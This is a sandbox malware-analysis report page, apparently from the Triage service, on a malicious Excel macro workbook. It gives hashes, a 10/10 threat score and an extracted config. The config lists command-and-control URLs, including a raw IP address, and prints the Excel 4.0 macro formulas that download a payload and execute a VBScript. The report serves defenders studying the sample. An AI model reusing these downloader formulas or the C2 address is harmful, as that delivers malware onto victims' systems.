b10e20019338f116e68cc34f9932e12f | Triage

Submit
Reports

Overview

overview

Static

static

b10e200193...f.xlsm

windows7-x64

b10e200193...f.xlsm

windows10-2004-x64

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

b10e20019338f116e68cc34f9932e12f.xlsm

Resource

win7-20231215-en

windows7-x64

7 signatures

150 seconds

Behavioral task

behavioral2

Sample

b10e20019338f116e68cc34f9932e12f.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

7 signatures

150 seconds

General

Target

b10e20019338f116e68cc34f9932e12f
Size

6KB
MD5

b10e20019338f116e68cc34f9932e12f
SHA1

6514c0b127c01c02f471f643772bed51abda6d39
SHA256

4dc2e1cbc8fb771ed10c4e9957437c6e3962de1223e700275a53f41adb036763
SHA512

cb8daa79b2435445cefa14ee0700b065fde39f23fa80d4879afd09afc1b703f962e1709ce89530af179f8270038547c2526cd4d486e9969929130a7a97a29020
SSDEEP

192:NDSauSYbrA2OmmfRf8UhHFBFYuRb98y254W+s:N5uZM2wV1FYgb98y254g

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes

formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

b10e20019338f116e68cc34f9932e12f
.xlsm office2007

© 2018-2025

Terms | Privacy